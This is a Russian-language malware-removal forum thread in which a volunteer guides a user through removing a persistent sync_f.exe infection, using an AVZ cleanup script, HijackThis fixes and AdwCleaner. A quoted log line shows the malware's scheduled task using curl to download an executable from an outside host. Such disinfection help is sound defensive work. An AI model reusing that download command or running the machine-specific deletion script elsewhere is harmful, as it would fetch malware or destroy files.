Помогите проблемы с файлом sync_f.exe

[Сергей76]

На вашем форуме уже был человек с такой же проблемой. В диспетчере задач появляется этот файл и начинается торможение системы. Пробовал удалить его но он снова появляется.

[Mark D. Pearlstone]

Порядок оформления запроса о помощи

[Сергей76]

Я читал порядок оформления запроса и скачал от туда  AVRT.  И проверил им комп. С начало он нашел 2 объекта потом 7  потом 10 и каждый раз с перезагрузкой компа.  И вот сейчас он  показал что мой комп чист.  Думаю что он решил проблему с файлом sync_f.exe 

[regist]

Логи Автологера, где?

[Сергей76]

Вот только что проверил.

avz_log.txt

Изменено 31 октября, 2017 пользователем Сергей76

[Sandor]

Перечитайте еще раз внимательно. Нужен архив с именем CollectionLog

[Сергей76]

Но это же позавчерашний файл

CollectionLog-2017.10.29-17.25.zip

[regist]

Здравствуйте!

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 TerminateProcessByName('C:\ProgramData\AppData\Local\Microsoft\Windows\Templates\SyncTemplate\sync_f.exe');
 TerminateProcessByName('C:\Users\Sergei\AppData\Roaming\Temp\TasksHost\thostmgr.exe');
 QuarantineFile('C:\ProgramData\AppData\Local\Microsoft\Windows\Templates\SyncTemplate\sync_f.exe', '');
 QuarantineFile('C:\Users\Sergei\AppData\Local\Temp\Realtek HD\rthdcpl.exe', '');
 QuarantineFile('C:\Users\Sergei\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\Sergei\appdata\roaming\imagecropresize\imageed\imageed.exe', '');
 QuarantineFile('C:\Users\Sergei\AppData\Roaming\Temp\TasksHost\thostmgr.exe', '');
 QuarantineFileF('c:\users\sergei\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0);
 QuarantineFileF('C:\Users\Sergei\appdata\roaming\imagecropresize\imageed\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\ProgramData\AppData\Local\Microsoft\Windows\Templates\SyncTemplate\sync_f.exe');
 DeleteFile('C:\ProgramData\AppData\Local\Microsoft\Windows\Templates\SyncTemplate\sync_f.exe', '32');
 DeleteFile('C:\Users\Sergei\AppData\Local\Temp\Realtek HD\rthdcpl.exe', '32');
 DeleteFile('C:\Users\Sergei\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\Sergei\appdata\roaming\imagecropresize\imageed\imageed.exe');
 DeleteFile('C:\Users\Sergei\AppData\Roaming\Temp\TasksHost\thostmgr.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Realtek HD Audio" /F', 0, 15000, true);
 DeleteFileMask('c:\users\sergei\appdata\roaming\curl', '*', true);
 DeleteDirectory('c:\users\sergei\appdata\roaming\curl');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.


 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

Advanced SystemCare 11 [20171028]-->"C:\Program Files (x86)\IObit\Advanced SystemCare\unins000.exe"
Driver Booster 5 [20171028]-->"C:\Program Files (x86)\IObit\Driver Booster\5.0.3\unins000.exe"
IObit Uninstaller [20171028]-->"C:\Program Files (x86)\IObit\IObit Uninstaller\unins000.exe"

Деинсталируйте.

 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

Изменено 31 октября, 2017 пользователем regist

[Сергей76]

 [KLAN-7075662563]

[regist]

@Сергей76, ждём остальное. И лучше всё разом выкладывайте.

[Сергей76]

 [KLAN-7075662563]

CollectionLog-2017.11.01-14.56.zip

Изменено 1 ноября, 2017 пользователем regist
Не надо прикреплять карантин к сообщению

[regist]

1) Карантин не надо прикреплять к сообщению.

2) Unity Web Player - если сами не ставили, то деинсталируйте.

3) Файл

C:\Users\Sergei\Favorites\Links\Интернет.url

удалите вручную.

4)"Пофиксите" в HijackThis:

O2-32 - BHO: IObit Ads Removal - {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\Adblock\Adblock.dll (file missing)
O22 - Task (Disabled): \Microsoft\Windows\Media Center\PeriodicScanRetry - C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (file missing)
O22 - Task (Disabled): \Microsoft\Windows\Media Center\RecordingRestart - C:\WINDOWS\ehome\ehrec /RestartRecording (file missing)
O22 - Task (Disabled): \Microsoft\Windows\Shell\WindowsParentalControls - {DFA14C43-F385-4170-99CC-1B7765FA0E4A} - C:\Windows\SysWOW64\wpcumi.dll (file missing)
O22 - Task (Disabled): \Microsoft\Windows\Shell\WindowsParentalControlsMigration - {343D770D-7788-47C2-B62A-B7C4CED925CB} - C:\Windows\SysWOW64\wpcmig.dll (file missing)
O22 - Task (Ready): Driver Booster SkipUAC (Sergei) - C:\Program Files (x86)\IObit\Driver Booster\5.0.3\DriverBooster.exe /skipuac (file missing)
O22 - Task (Ready): DuckGo Task - C:\Users\Sergei\AppData\Local\DuckGo\duckgo.exe (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\ActivateWindowsSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\ConfigureInternetTimeService - C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\DispatchRecoveryTasks - C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\InstallPlayReady - C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\MediaCenterRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe - (no file) -MediaCenterRecoveryTask (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\OCURActivate - C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\OCURDiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe - (no file) -ObjectStoreRecoveryTask (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\PBDADiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\PBDADiscoveryW1 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\PBDADiscoveryW2 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\PvrRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe - (no file) -PvrRecoveryTask (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\PvrScheduleTask - C:\WINDOWS\ehome\mcupdate.exe - (no file) -PvrSchedule (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\RegisterSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\ReindexSearchRoot - C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\SqlLiteRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe - (no file) -SqlLiteRecoveryTask (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\StartRecording - C:\WINDOWS\ehome\ehrec /StartRecording (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\UpdateRecordPath - C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\ehDRMInit - C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\mcupdate - C:\WINDOWS\ehome\mcupdate $(Arg0) (file missing)
O22 - Task (Ready): \Microsoft\Windows\Media Center\mcupdate_scheduled - C:\WINDOWS\ehome\mcupdate -crl -hms -pscn 15 (file missing)
O22 - Task (Ready): curl - C:\Users\Sergei\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Sergei\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): wupdate - C:\Users\Sergei\AppData\Local\wupdate\wupdate.exe (file missing)
O22 - Task (Ready): {3EA78273-890C-35D8-1067-52C795010DD1} - C:\ProgramData\{D5C96BC2-6262-DC69-DCD2-FFF30FAD5925}\9A6FCD90-2DC4-7A3B-62AB-98F57D0B08CD.exe /run (file missing)

 

5) Сделайте свежие логи Автологером.

6)

• Скачайте AdwCleaner и сохраните его на Рабочем столе.
• Запустите его (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
• Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt.
• Прикрепите отчет к своему следующему сообщению.

[Сергей76]

Вот эти файлы.

CollectionLog-2017.11.01-16.36.zip

AdwCleanerS0.txt

[regist]

3-й пункт из предыдущего сообщения не сделали, не удалили вирусный ярлык.

Выполните

+

• Запустите повторно AdwCleaner (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора).
• В меню Tools ->Options (Инструменты ->Настройки) отметьте:
  
  • Сброс политик IE
  • Сброс политик Chrome
    

  [*]Нажмите кнопку "Scan" ("Сканировать"), а по окончанию сканирования нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления. [*]Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt. [*]Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

[Сергей76]

Сделал.

AdwCleanerC0.txt